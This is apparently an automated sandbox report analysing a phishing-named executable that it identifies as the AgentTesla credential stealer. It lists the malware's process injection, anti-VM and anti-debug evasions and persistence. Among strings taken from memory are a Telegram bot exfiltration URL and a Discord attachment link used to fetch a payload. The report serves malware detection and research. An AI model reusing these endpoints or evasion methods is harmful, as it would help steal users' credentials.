Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New Order PO20011046.exe

Overview

General Information

Sample Name:New Order PO20011046.exe
Analysis ID:324078
MD5:310a7ca550b9997d0e0bcaf645530303
SHA1:5617d1e233381ea3fd6ab796fcc6a2de66137c51
SHA256:0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
Tags:ESPexegeo

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • New Order PO20011046.exe (PID: 7048 cmdline: 'C:\Users\user\Desktop\New Order PO20011046.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
    • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • New Order PO20011046.exe (PID: 1256 cmdline: C:\Users\user\Desktop\New Order PO20011046.exe MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 5488 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 4868 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\uvvE.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\uvvE.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\uvvE.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.New Order PO20011046.exe.4a80000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.2.New Order PO20011046.exe.4b40000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.New Order PO20011046.exe.4b40000.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.New Order PO20011046.exe.4a80000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Svchost ProcessShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700
                    Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeReversingLabs: Detection: 68%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: New Order PO20011046.exeVirustotal: Detection: 32%Perma Link
                    Source: New Order PO20011046.exeReversingLabs: Detection: 68%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJoe Sandbox ML: detected
                    Machine Learning detection for sampleShow sources
                    Source: New Order PO20011046.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_504851E0
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 4x nop then mov eax, dword ptr [00460BCCh]0_3_02BE896C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 4x nop then mov eax, ecx0_3_02BE8C98
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 4x nop then mov eax, dword ptr [00460BCCh]16_3_02D2896C
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 4x nop then mov eax, ecx16_3_02D28C98
                    Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: unknownDNS traffic detected: queries for: discord.com
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://hltGXE.com
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/Evvured
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/J
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

                    System Summary:

                    barindex
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: New Order PO20011046.exe
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DB9BA NtQuerySystemInformation,11_2_020DB9BA
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DB97F NtQuerySystemInformation,11_2_020DB97F
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Windows\assembly\Desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02BDA4F40_3_02BDA4F4
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00406C5011_2_00406C50
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040286011_2_00402860
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0041A47E11_2_0041A47E
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00408C1011_2_00408C10
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00418C8C11_2_00418C8C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040165011_2_00401650
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0041820411_2_00418204
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402ED011_2_00402ED0
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402B4011_2_00402B40
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0041874811_2_00418748
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040735011_2_00407350
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402F3911_2_00402F39
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040DBD111_2_0040DBD1
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00407BEF11_2_00407BEF
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0041938411_2_00419384
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 16_3_02D1A4F416_3_02D1A4F4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 50484278 appears 51 times
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: String function: 0040E198 appears 44 times
                    Source: New Order PO20011046.exeStatic PE information: invalid certificate
                    Source: New Order PO20011046.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: New Order PO20011046.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Evvudrv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Evvudrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: New Order PO20011046.exe, 0000000B.00000001.758964598.0000000000448000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameuszkpYZrHmwlxpeBdJLqZbZT.exe4 vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.922240026.0000000005300000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs New Order PO20011046.exe
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@15/7@6/4
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DA9DA AdjustTokenPrivileges,11_2_020DA9DA
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DA9A3 AdjustTokenPrivileges,11_2_020DA9A3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_5048789A GetDiskFreeSpaceA,5_2_5048789A
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: New Order PO20011046.exeVirustotal: Detection: 32%
                    Source: New Order PO20011046.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Users\user\Desktop\New Order PO20011046.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\New Order PO20011046.exe 'C:\Users\user\Desktop\New Order PO20011046.exe'
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' 'Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' 'Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile written: C:\Windows\assembly\Desktop.iniJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: New Order PO20011046.exeStatic file information: File size 1311424 > 1048576
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: Binary string: _.pdb source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeUnpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeUnpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C137 push esi; retf 0_3_0237C146
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D536 push esi; retf 0_3_0237D537
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237943F push edi; ret 0_3_0237944C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B338 push esi; retf 0_3_0237B33C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C724 push esi; retf 0_3_0237C819
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379C23 push ebx; ret 0_3_02379C39
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379E14 push ebx; ret 0_3_02379E16
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C81F push esi; retf 0_3_0237C822
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D61B push esi; retf 0_3_0237D621
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D207 push esi; retf 0_3_0237D211
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D607 push esi; retf 0_3_0237D615
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237997C push ebx; ret 0_3_02379987
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B178 push esi; retf 0_3_0237B1A8
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237926C push esi; retf 0_3_02379272
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379A6C push esi; retf 0_3_02379A70
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D153 push esi; retf 0_3_0237D201
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D24E push esi; retf 0_3_0237D24F
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B0B3 push esi; retf 0_3_0237B16C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237A7B0 push esi; retf 0_3_0237A7D8
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C1A9 push esi; retf 0_3_0237C1EB
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237A392 push edi; iretd 0_3_0237A393
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237949D push ebx; ret 0_3_0237949F
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C49C push esi; retf 0_3_0237C4BC
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B287 push esi; retf 0_3_0237B288
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C2FC push esi; retf 0_3_0237C393
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B5E4 push esi; retf 0_3_0237B5E5
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C4EF push esi; retf 0_3_0237C4F1
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379EE9 push ebx; ret 0_3_02379EEB
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C5D6 push esi; retf 0_3_0237C5FE
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C3C2 push esi; retf 0_3_0237C3CF
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02BD1AA4 push 00440316h; ret 0_3_02BD1B02
